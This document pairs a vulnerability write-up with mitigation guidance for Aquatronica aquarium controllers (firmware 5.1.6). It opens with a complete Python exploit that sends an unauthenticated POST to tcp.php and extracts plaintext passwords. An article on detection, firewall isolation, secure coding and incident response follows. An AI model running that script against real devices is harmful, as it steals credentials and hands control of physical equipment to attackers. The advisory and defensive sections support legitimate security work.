Aquatronica Control System 5.1.6 - Information Disclosure
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
#
#
# Vendor: Aquatronica s.r.l.
# Product web page: https://www.aquatronica.com
# Affected version: Firmware: 5.1.6
# Web: 2.0
#
# Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy
# to use, allowing you to control all the electrical devices in
# an aquarium and to monitor all their parameters; it can be used
# for soft water aquariums, salt water aquariums or both simultaneously.
#
# Desc: The tcp.php endpoint on the Aquatronica controller is exposed
# to unauthenticated attackers over the network. This vulnerability
# allows remote attackers to send a POST request which can reveal
# sensitive configuration information, including plaintext passwords.
# This can lead to unauthorized access and control over the aquarium
# controller, compromising its security and potentially allowing attackers
# to manipulate its settings.
#
# Tested on: Apache/2.0.54 (Unix)
# PHP/5.4.17
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2024-5824
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
#
#
# 04.05.2024
#
import requests, html, re, sys, time
from urllib.parse import unquote
program = "TCP"
command = "ws_get_network_cfg"
function_id = "TCP_XML_REQUEST"
print("""
_________ . .
(.. \_ , |\ /|
\ O \ /| \ \/ /
\______ \/ | \ /
vvvv\ \ | / |
\^^^^ == \_/ |
`\_ === \. |
/ /\_ \ / |
|/ \_ \| /
___ ______________\________/________aquatronica_0day___
| |
| |
| |
""")
if len(sys.argv) != 2:
print("Usage: python aqua.py <ip:port>")
sys.exit(1)
ip = sys.argv[1]
url = f"http://{ip}/{program.lower()}.php"
post_data = {'function_id' : function_id.lower(),
'command' : command.upper()}
r = requests.post(url, data=post_data)
if r.status_code == 200:
r_d = unquote(r.text)
f_d_r = html.unescape(r_d)
regex = r'pwd="([^"]+)"'
rain = re.findall(regex, f_d_r)
for drops in rain:
print(' ',drops)
time.sleep(0.5)
else:
print(f"Dry season! {r.status_code}")Aquatronica Control System 5.1.6 — Information Disclosure: Overview and Mitigation
This article explains an information disclosure vulnerability reported for Aquatronica electronic aquarium controllers running firmware version 5.1.6. It focuses on risk assessment, safe detection approaches, immediate and long‑term mitigations, and secure development practices to prevent similar weaknesses. The content is written for system owners, administrators, and developers responsible for embedded web interfaces and industrial/IoT devices.
Summary of the Issue
A vulnerability was publicly reported that can expose sensitive configuration data from certain Aquatronica controllers. In affected devices the web interface endpoint that serves configuration data may disclose plaintext passwords and other secrets when improperly protected. Exposed credentials can allow an attacker to gain control over device functions and to pivot into adjacent networks.
Why this is Serious
- Plaintext credentials are trivial to reuse; they enable remote or local unauthorized control.
- IoT/embedded devices are often long lived and rarely updated, increasing window of exposure.
- Network placement matters: devices reachable from the Internet or large LANs increase blast radius.
Affected Products and Advisory
| Vendor | Product | Affected Firmware | Public Advisory |
|---|---|---|---|
| Aquatronica s.r.l. | Aquarium Controller (web management) | Firmware 5.1.6 (web: 2.0) | ZSL-2024-5824 |
Impact Scenarios and Use Cases
- Malicious actor discovers plaintext admin credentials and changes device configuration, timers, or actuators (lights, pumps, feeders)
- Compromised device used as a foothold to scan or attack other devices on the same network
- Exposure of configuration data leads to privacy or operational concerns for commercial aquaria or research deployments
Safe and Responsible Detection (What Administrators Should Do)
When investigating whether devices in your environment are vulnerable, follow safe, non‑invasive practices.
- Inventory devices by vendor and firmware version using authenticated management channels, asset management tools, or passive network monitoring (e.g., device fingerprinting in a controlled environment).
- Check vendor release notes for firmware versions and fixes — confirm whether an affected firmware is present.
- Avoid unauthenticated probing of device endpoints from untrusted networks. If you must test, perform tests from an isolated management VLAN or lab environment and follow responsible disclosure practices.
Immediate Mitigations (Quick Actions for Administrators)
- Isolate affected devices: move controllers to a segmented management VLAN that is not directly reachable from the Internet.
- Restrict access: apply firewall rules (network or host-based) to permit management only from trusted IP ranges or jump hosts.
- Change default or known credentials for any exposed accounts and enforce strong passwords.
- Disable remote management from WAN in device settings until a fix is applied.
- Enable and collect logs for access to device management interfaces to detect unauthorized attempts.
Example Defensive Network Rule
# Example: restrict HTTP(S) management to a trusted management subnet (iptables)
# Allow management subnet 10.0.0.0/24; block other remote access to port 80/443
iptables -A INPUT -p tcp --dport 80 -s 10.0.0.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s 10.0.0.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP
Explanation: The example above is defensive and restricts web management ports so only systems in a trusted subnet can reach them. Adjust subnets, ports, and firewall system to match your environment. Test rules in a safe environment before deploying to production.
Vendor/Device Remediation (Recommended Fixes)
- Release a firmware update that removes authentication bypasses and ensures configuration endpoints never return plaintext credentials.
- Introduce proper authentication and session management for all management endpoints; adopt standards such as HTTP session tokens with appropriate expiration and CSRF protections.
- Encrypt stored secrets using strong, device-appropriate storage (preferably with hardware-backed key storage when available) and never export plaintext secrets in API responses.
- Use HTTPS by default for web management, with strong TLS configuration and certificate management, to prevent eavesdropping and tampering on the network.
Secure Coding Practices for Device Web Interfaces
Below is a defensive, non-exploit PHP example showing how an endpoint should check authentication and avoid returning sensitive fields. This is a simplified illustration focused on safe behavior and secure response handling.
<?php
// Simple defensive pattern: require authentication and redact secrets before responding
session_start();
// Check for an authenticated session (example)
if (!isset($_SESSION['user']) || $_SESSION['user']['role'] !== 'admin') {
http_response_code(401);
echo json_encode(['error' => 'unauthorized']);
exit;
}
// Load configuration from secure store (do not include raw secrets in outputs)
$config = load_device_config(); // implement read from secure storage
// Redact sensitive fields before returning to the client
$redacted = $config;
if (isset($redacted['password'])) {
$redacted['password'] = '****REDACTED****';
}
if (isset($redacted['api_key'])) {
$redacted['api_key'] = '****REDACTED****';
}
header('Content-Type: application/json; charset=utf-8');
echo json_encode($redacted);
?>
Explanation: This snippet demonstrates three defensive principles: require authenticated access, avoid returning secrets, and present well-formed JSON with no plaintext passwords. In a production implementation, session handling, input validation, and secure storage access must be robust and follow up-to-date security guidance.
Recommended Secure Development Enhancements
- Do not store or transmit plaintext passwords; store hashed credentials where appropriate and use encryption for secrets.
- Adopt least privilege in APIs — endpoints should only return data needed by the caller and should never broadcast secrets.
- Implement logging and alerting for sensitive endpoint access and failed authorization attempts.
- Use automated security testing (static analysis, dynamic testing) as part of firmware build pipelines.
Incident Response Steps
- Assume credentials may be compromised if an affected device was reachable prior to mitigation — rotate passwords and API keys used on or by the device.
- Collect and preserve logs for forensic analysis: access logs, network captures (if available), and firmware/software versions.
- Notify stakeholders and follow your organization’s incident response plan; if the device is fielded for customers, coordinate a disclosure and remediation plan with the vendor.
Responsible Disclosure and Coordination
If you are a security researcher or vendor, follow responsible disclosure practices: coordinate privately with the vendor, allow reasonable time for a patch, and provide mitigation guidance. Public advisories should include clear indicators and remediation steps for administrators to protect installations while a patch is prepared.
References and Further Reading
- Zeroscience advisory: ZSL-2024-5824 — public advisory describing the issue (researchers and admins should review for context).
- OWASP IoT Top 10 — guidance on common IoT and embedded device risks and mitigations.
- Vendor firmware and release notes — check Aquatronica support channels for official patches and remediation instructions.
Final Notes for Operators
Devices that control physical systems deserve the same operational security rigor as traditional IT systems. If you manage Aquatronica controllers (or similar IoT products), prioritize network segmentation, patch management, strong authentication, and coordinated vendor engagement to reduce exposure and protect both device operation and broader network assets.